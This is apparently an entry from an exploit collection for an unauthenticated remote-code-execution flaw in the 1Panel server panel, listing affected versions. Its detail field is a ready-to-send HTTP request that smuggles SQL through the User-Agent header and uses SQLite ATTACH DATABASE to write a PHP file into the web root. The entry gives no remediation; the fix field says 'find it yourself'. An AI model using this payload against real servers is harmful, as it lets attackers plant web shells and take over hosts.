vendor = "1Panel"
name = "1Panel面板最新前台RCE漏洞"
type = "RCE"
version = "专业版 v1.10.10-lts 社区版 v1.10.10-lts 1panel/openresty:1.21.4.3-3-1-focal"
path = "/"
detail = "GET / HTTP/1.1 Host: 192.168.99.6 User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5(\"blog.mo60.cn\"); ?>');#"
fix = "自己找"
date = "0723"
label = "nday"
